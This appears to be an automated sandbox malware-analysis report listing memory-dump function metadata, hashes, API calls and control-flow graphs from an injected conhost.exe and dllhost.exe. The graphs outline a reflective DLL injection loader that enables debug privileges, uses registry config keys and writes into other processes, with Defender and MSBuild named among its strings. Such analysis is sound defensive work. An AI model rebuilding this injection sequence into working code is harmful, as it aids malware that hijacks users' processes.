                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 7b6bb1192652a5e0d0c37ad3ddbf4a813db488dd0e6fe36d00706a62ae844aa4
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 63619A72508BC482EBB08F19E4403DAB7A1F795B99F044216EBD813B99EB7DC1D0CB42
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: d020bb45d75ffdc336c99447d6371f8b1c78dbb06b634e60f98b91c3ea9262b6
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: DC517032200B808BEFB48F2AD54439877A6F354B96F144117EA9947BD5EB3AC5D1CB83
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 2bb74df370bb4cb4120e61fe9e1a5ce2ec6805c7ceefbcf371da93883992c485
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: 32119331310F8191FF909B2AE8003DA63A6F744782F8041279E5983A94FF6AC985C781
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: fe6b0d90a6c60f0d911bd3ffeb53e988dbf7d31a3afa1d03e278679062f14825
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: BED1EE32718E8489EB90CFA9D5442EC37B2F354B99F404216CE5DA7B9AFB74C186D381
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 0c9d65a8d1ecba206d2d000ab7f080e8b9e6c0304b208ff20d88faf68f9a3efd
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: FF01D732610E90DAEB54DF66A80419D77B2F788F85B094026DB4963728FF74D491C781
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001D5478428DF), ref: 000001D547842A12
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: 16e0e29981202e10ebfe555d1d51592211b92069c4761755f9d4b35594ee60b0
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: C891E232614E5089FFA0CF6699507ED2BA2F358B99F444107DE4A63A85FBB4C4C5E382
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: c7d28bb6f59473af032823573730bc52b3a8930172ff95ae1054625188d5243e
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: BB112736710F048AEF40CF60E8543A933A4F719759F440E22EA6D967A4EB78C1948381
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: bcc21616a665af8cefb32a4710038670d2d9cf784b8434e78253a3f0c8f81cb3
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: 2071A336200F8146EFB49E2ED9543EA6796F385B96F450027DE5993B88FF36C680C781
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000003.2188818508.000001D547800000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D547800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_3_1d547800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3242871069-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 78d994aa14f0174a5e6a5148a0d8512db9b757d735f33d0337e00e4f89fd93bc
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 9351D832312E848ADF94CF25E444BAD3B93F754B99F164526DA4A47788FB78C8C1C781
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000003.2188818508.000001D547800000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D547800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_3_1d547800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 445367bf9ac272c1474cde81a48ce4178ebe3615936416496bd07e9b25859b4b
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 1461AA72508FC482EBB08F15E4443DABBA1F795B99F054216EF9807B99EB78C1D0CB41
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: b271bf00856705a48a24a708d7f1545c28e135257c627a0d4d1a4adc349c1d73
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: 3851D136204F9181EFA4DE2EA6543EA6792F795B82F540027CD5943B89FB3BC484C7C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: d0244a63b17811a3f06975e0eef69c9918f9b5f98539d2178aa46657fac22587
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: 0F41E632629E8486EF90DF25E4447DAB7A2F388795F804122EE4D87758FF78C481C781
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 9ee573bb39f63182173a74fb8c1b60342e5b471e5460e41b04e20a3ef98a1c6a
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: 61115B32214F8082EB608B19F40429DB7E6F788B89F584222EE8D17B64EF7DC591CB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: 039eb85ddd578a2d690c086fc3123b12240d9227d9c42b09866a0e4b2fa19f57
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: BA115B31A11F8085EF54CB6AA80829967B2F789FD1F588126DE4E53765FF79D4828380
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: 78263a6ff3a14f33180f977582ef684d2620488266bba599fd7f4cf607a631fb
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: 85E09231601A049AEB548F62D80838D36F2FB8CF46F44C024C90907350FFBD84D9E791
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: f7ed7103cd2d4480db5571f89765ba38b8e66195bddab985dbcc25ffb18b8986
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: BEE0ED716119049AEB589B62D80429D76B2FB88B56F448025C90907310FF7884D9A651

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 140002d4c-140002d5c 1 140002d5e-140002d75 OpenMutexW 0->1 2 140002d84-140002dc1 CloseHandle call 140002a0c * 2 GetCurrentProcessId OpenProcess 1->2 3 140002d77-140002d82 Sleep 1->3 8 140002dc3-140002dd7 OpenProcessToken 2->8 9 140002e39-140002e64 RegOpenKeyExW 2->9 3->1 10 140002dd9-140002dee LookupPrivilegeValueW 8->10 11 140002e30-140002e33 CloseHandle 8->11 12 1400031b3-1400031c1 9->12 13 140002e6a-140002e94 RegQueryValueExW 9->13 10->11 15 140002df0-140002e28 AdjustTokenPrivileges 10->15 11->9 13->12 14 140002e9a-140002ec4 RegQueryValueExW 13->14 14->12 16 140002eca-140002f36 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 14->16 15->11 17 140002e2a GetLastError 15->17 16->12 18 140002f3c-140002f66 RegQueryValueExW 16->18 17->11 18->12 19 140002f6c-140002fba RegCloseKey GetCurrentProcessId call 14000200c RegCreateKeyExW 18->19 22 14000307d-140003111 CreateThread GetProcessHeap HeapAlloc CreateThread * 2 call 14000151c 19->22 23 140002fc0-140002fe6 ConvertStringSecurityDescriptorToSecurityDescriptorW 19->23 30 140003113-140003143 ShellExecuteW 22->30 31 140003145-1400031ad call 14000148c call 1400011d4 call 14000148c * 3 call 1400011d4 * 3 GetProcessHeap HeapFree SleepEx 22->31 24 140003002-14000303a RegCreateKeyExW 23->24 25 140002fe8-140002ffc RegSetKeySecurity LocalFree 23->25 27 140003073-140003077 RegCloseKey 24->27 28 14000303c-14000306d GetCurrentProcessId RegSetValueExW RegCloseKey 24->28 25->24 27->22 28->27 30->30 30->31 31->12
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
                                                  • String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                                  • API String ID: 2725631067-1382791509
                                                  • Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                                  • Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
                                                  • Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                                  • Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 48 140001868-1400018aa OpenProcess 49 140001cd1-140001ced 48->49 50 1400018b0-1400018c5 IsWow64Process 48->50 51 1400018d5 50->51 52 1400018c7-1400018d3 50->52 53 1400018db-1400018e7 CloseHandle 51->53 52->53 53->49 54 1400018ed-1400018f8 53->54 54->49 55 1400018fe-140001913 54->55 56 140001925 55->56 57 140001915-14000191a 55->57 59 140001927-140001929 56->59 57->49 58 140001920-140001923 57->58 58->59 59->49 60 14000192f-140001945 OpenProcess 59->60 60->49 61 14000194b-140001964 OpenProcess 60->61 62 140001a04-140001a23 NtQueryInformationProcess 61->62 63 14000196a-140001981 K32GetModuleFileNameExW 61->63 66 140001cc8-140001ccb CloseHandle 62->66 67 140001a29-140001a2d 62->67 64 1400019b3-1400019bf CloseHandle 63->64 65 140001983-14000199e PathFindFileNameW lstrlenW 63->65 64->62 69 1400019c1-1400019db 64->69 65->64 68 1400019a0-1400019b0 StrCpyW 65->68 66->49 67->66 70 140001a33-140001a4b OpenProcessToken 67->70 68->64 71 1400019e0-1400019f2 StrCmpIW 69->71 70->66 72 140001a51-140001a77 GetTokenInformation 70->72 71->66 73 1400019f8-140001a02 71->73 74 140001af4 72->74 75 140001a79-140001a82 GetLastError 72->75 73->62 73->71 76 140001afb-140001b09 CloseHandle 74->76 75->74 77 140001a84-140001a98 LocalAlloc 75->77 76->66 78 140001b0f-140001b16 76->78 77->74 79 140001a9a-140001ac0 GetTokenInformation 77->79 78->66 80 140001b1c-140001b27 78->80 81 140001ae2 79->81 82 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 79->82 80->66 84 140001b2d-140001b37 80->84 83 140001ae9-140001af2 LocalFree 81->83 82->83 83->76 85 140001b52 84->85 86 140001b39-140001b43 84->86 88 140001b56-140001b8e call 1400029a4 * 3 85->88 86->66 87 140001b49-140001b50 86->87 87->88 88->66 95 140001b94-140001bb4 call 1400029a4 StrStrA 88->95 98 140001bb6-140001bc6 95->98 99 140001bcd-140001bf2 call 1400029a4 * 2 95->99 98->95 100 140001bc8 98->100 99->66 105 140001bf8-140001c21 VirtualAllocEx 99->105 100->66 105->66 106 140001c27-140001c40 WriteProcessMemory 105->106 106->66 107 140001c46-140001c68 call 140002bfc 106->107 107->66 110 140001c6a-140001c72 107->110 110->66 111 140001c74-140001c81 WaitForSingleObject 110->111 112 140001c83-140001c97 GetExitCodeThread 111->112 113 140001cbd-140001cc2 CloseHandle 111->113 114 140001ca2-140001cbb VirtualFreeEx 112->114 115 140001c99-140001c9f 112->115 113->66 114->113 115->114
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                  • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                                  • API String ID: 2456419452-2628171563
                                                  • Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                                                  • Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
                                                  • Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
